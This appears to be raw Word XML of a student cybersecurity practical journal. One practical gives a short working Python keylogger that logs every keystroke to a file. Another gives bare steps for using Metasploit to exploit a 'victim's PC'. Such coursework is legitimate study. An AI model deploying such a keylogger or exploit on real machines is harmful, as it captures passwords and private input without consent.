            <wp:docPr id="565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8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01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80" w:left="1220" w:header="0" w:footer="8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296621" w:rsidP="00D569E9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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00A3347F" w:rsidRDefault="00D4195F" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PRACTICAL NO. 9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Aim: -</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a simple </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using python</w:t>
      </w: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Code: -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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pynput.keyboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import Key, Listener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>import logging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># if no name it gets into an empty string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>log_dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ""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># This is a basic logging function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logging.basicConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(filename=(log_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+"key_log.txt"), level=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logging.DEBUG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, format='%(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>asctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)s:%(message)s:')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># This is from the library</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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(key):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ab/>
        <w:t>logging.info(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(key))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># This says, listener is on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>with Listener(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=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) as listener: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ab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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Output: -</w:t>
      </w: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800475" cy="287191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6" cy="28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A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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D4195F" w:rsidRPr="00A3347F" w:rsidRDefault="00A3347F" w:rsidP="00A3347F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00D4195F" w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PRACTICAL NO. 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00D4195F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 xml:space="preserve">AIM: Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C94E44" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C94E44" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> to exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00D4195F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</w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00D4195F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>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00C94E44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 xml:space="preserve">Download and open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00C94E44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>Use exploit to attack the host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00C94E44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>Create the exploit and add the exploit to the victim’s PC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00C94E44">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5781675" cy="4905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E44" w:rsidRPr="00D4195F" w:rsidSect="00E60381">
      <w:footerReference w:type="default" r:id="rId89"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="620" w:right="1040" w:bottom="1440" w:left="1220" w:header="0" w:footer="881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7A" w:rsidRDefault="0029587A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0029587A" w:rsidRDefault="0029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6" o:spid="_x0000_s2067" type="#_x0000_t202" style="position:absolute;margin-left:70.8pt;margin-top:729pt;width:262.8pt;height:25.8pt;z-index:-123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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C" w:rsidP="00780195">
                <w:pPr>
                  <w:pStyle w:val="BodyText"/>
                  <w:spacing w:line="26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IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id=" 45" o:spid="_x0000_s2066" type="#_x0000_t202" style="position:absolute;margin-left:432.25pt;margin-top:728.7pt;width:113.75pt;height:14pt;z-index:-12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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C" w:rsidP="0015039B">
                <w:pPr>
                  <w:pStyle w:val="BodyText"/>
                  <w:spacing w:line="26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05pt;margin-top:0;width:184.2pt;height:21.5pt;z-index:-122056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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p w:rsidR="00E5519C" w:rsidRPr="00D569E9" w:rsidRDefault="00E5519C" w:rsidP="00D569E9"/>
            </w:txbxContent>
          </v:textbox>
          <w10:wrap anchorx="page" anchory="margin"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id="_x0000_s2049" type="#_x0000_t202" style="position:absolute;margin-left:434.5pt;margin-top:736.95pt;width:113.75pt;height:14pt;z-index:-12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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox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6" o:spid="_x0000_s2065" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:184.2pt;height:21.5pt;z-index:-114864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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 6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  <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id=" 5" o:spid="_x0000_s2064" type="#_x0000_t202" style="position:absolute;margin-left:434.5pt;margin-top:736.95pt;width:113.75pt;height:14pt;z-index:-11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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 5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15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2" o:spid="_x0000_s2061" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:185.15pt;height:17.75pt;z-index:-122920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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 42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  <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id=" 41" o:spid="_x0000_s2060" type="#_x0000_t202" style="position:absolute;margin-left:434.5pt;margin-top:728.7pt;width:113.75pt;height:14pt;z-index:-122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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 41" inset="0,0,0,0">
            <w:txbxContent>
              <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C" w:rsidP="00197DA7">
                <w:pPr>
                  <w:pStyle w:val="BodyText"/>
                  <w:spacing w:line="26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8" o:spid="_x0000_s2059" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:188.9pt;height:18.7pt;z-index:-119984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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 18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  <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id=" 17" o:spid="_x0000_s2058" type="#_x0000_t202" style="position:absolute;margin-left:434.5pt;margin-top:726.45pt;width:113.75pt;height:14pt;z-index:-11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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 17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6" o:spid="_x0000_s2057" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:183.25pt;height:15.9pt;z-index:-117936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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 16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  <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id=" 15" o:spid="_x0000_s2056" type="#_x0000_t202" style="position:absolute;margin-left:434.5pt;margin-top:737.7pt;width:113.75pt;height:14pt;z-index:-11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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 15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E5519C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9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2" o:spid="_x0000_s2055" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:182.35pt;height:16.85pt;z-index:-122440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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 22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  <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id=" 21" o:spid="_x0000_s2054" type="#_x0000_t202" style="position:absolute;margin-left:434.5pt;margin-top:728.7pt;width:113.75pt;height:14pt;z-index:-122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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 21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6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0" o:spid="_x0000_s2053" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:185.15pt;height:17.75pt;z-index:-122392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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 20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  <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
      </w:rPr>
      <w:pict>
        <v:shape id=" 19" o:spid="_x0000_s2052" type="#_x0000_t202" style="position:absolute;margin-left:421pt;margin-top:744.45pt;width:113.75pt;height:14pt;z-index:-12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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 19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9C" w:rsidRDefault="0029587A">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="2"/>
      </w:rPr>
    </w:pPr>
    <w:r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2" o:spid="_x0000_s2051" type="#_x0000_t202" style="position:absolute;margin-left:71.05pt;margin-top:0;width:198.25pt;height:14.95pt;z-index:-122200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" filled="f" stroked="f">
          <v:path arrowok="t"/>
          <v:textbox style="mso-next-textbox:# 12" inset="0,0,0,0">
            <w:txbxContent>
              <w:p w:rsidR="00E5519C" w:rsidRDefault="00E5519C">
                <w:pPr>
                  <w:pStyle w:val="BodyText"/>
                  <w:spacing w:line="26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7A" w:rsidRDefault="0029587A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0029587A" w:rsidRDefault="0029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A4139"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C95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A7AA9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64E4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2F2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64E4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90A4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB2034B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90B00"/>
    <w:rsid w:val="00030BD3"/>
    <w:rsid w:val="0006143F"/>
    <w:rsid w:val="000A4069"/>
    <w:rsid w:val="000F00A0"/>
    <w:rsid w:val="000F17B3"/>
    <w:rsid w:val="0015039B"/>
    <w:rsid w:val="00151C86"/>
    <w:rsid w:val="00197DA7"/>
    <w:rsid w:val="002218A6"/>
    <w:rsid w:val="00224C7B"/>
    <w:rsid w:val="002350CB"/>
    <w:rsid w:val="00291626"/>
    <w:rsid w:val="0029587A"/>
    <w:rsid w:val="00296621"/>
    <w:rsid w:val="0035180C"/>
    <w:rsid w:val="00360A42"/>
    <w:rsid w:val="00363221"/>
    <w:rsid w:val="00390B00"/>
    <w:rsid w:val="00392C9A"/>
    <w:rsid w:val="003D03C4"/>
    <w:rsid w:val="00401CBD"/>
    <w:rsid w:val="00466BEB"/>
    <w:rsid w:val="004B1B81"/>
    <w:rsid w:val="004B3E99"/>
    <w:rsid w:val="004C3EDF"/>
    <w:rsid w:val="004F2A1E"/>
    <w:rsid w:val="00571599"/>
    <w:rsid w:val="005B6F48"/>
    <w:rsid w:val="005F07E8"/>
    <w:rsid w:val="006966BD"/>
    <w:rsid w:val="00780195"/>
    <w:rsid w:val="007A11B5"/>
    <w:rsid w:val="007A19F9"/>
    <w:rsid w:val="008577E0"/>
    <w:rsid w:val="008E066F"/>
    <w:rsid w:val="008E5DFD"/>
    <w:rsid w:val="008F220A"/>
    <w:rsid w:val="00947564"/>
    <w:rsid w:val="009A05B7"/>
    <w:rsid w:val="00A01965"/>
    <w:rsid w:val="00A1459A"/>
    <w:rsid w:val="00A3347F"/>
    <w:rsid w:val="00A735D3"/>
    <w:rsid w:val="00A913FB"/>
    <w:rsid w:val="00AB4449"/>
    <w:rsid w:val="00AE4681"/>
    <w:rsid w:val="00AE4A5C"/>
    <w:rsid w:val="00B11EA4"/>
    <w:rsid w:val="00B95B7F"/>
    <w:rsid w:val="00C30C54"/>
    <w:rsid w:val="00C564BF"/>
    <w:rsid w:val="00C94E44"/>
    <w:rsid w:val="00C96185"/>
    <w:rsid w:val="00CD2C75"/>
    <w:rsid w:val="00CF4123"/>
    <w:rsid w:val="00D4195F"/>
    <w:rsid w:val="00D52D70"/>
    <w:rsid w:val="00D569E9"/>
    <w:rsid w:val="00D72989"/>
    <w:rsid w:val="00D748F9"/>
    <w:rsid w:val="00DC27EC"/>
    <w:rsid w:val="00DD1B6A"/>
    <w:rsid w:val="00DE122E"/>
    <w:rsid w:val="00E141B2"/>
    <w:rsid w:val="00E2341D"/>
    <w:rsid w:val="00E54A23"/>
    <w:rsid w:val="00E5519C"/>
    <w:rsid w:val="00E60381"/>
    <w:rsid w:val="00E643D1"/>
    <w:rsid w:val="00ED1477"/>
    <w:rsid w:val="00F4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36337E9F"/>
  <w15:docId w15:val="{B1233F62-C356-4A36-8895-F4AE5A4F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3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3D1"/>
    <w:pPr>
      <w:ind w:left="3322" w:right="350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643D1"/>
    <w:pPr>
      <w:ind w:left="221" w:right="350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3D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3D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E643D1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE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A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43ECE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47564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56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estashop.com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jpe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jpeg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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7.jpeg"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61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43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpe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image" Target="media/image55.pn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footer" Target="footer4.xml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image" Target="media/image45.jpeg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hyperlink" Target="http://www.prestashop.com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60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml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6.jpeg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpeg"/><Relationship Id="rId76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footer" Target="footer2.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml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4.jpeg"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.jpe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2C0E-1CCA-406A-9619-EC7D951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Lahoti</dc:creator>
  <cp:lastModifiedBy>DELL</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <cp:lastPrinted>2018-01-03T18:53:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-19T07:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03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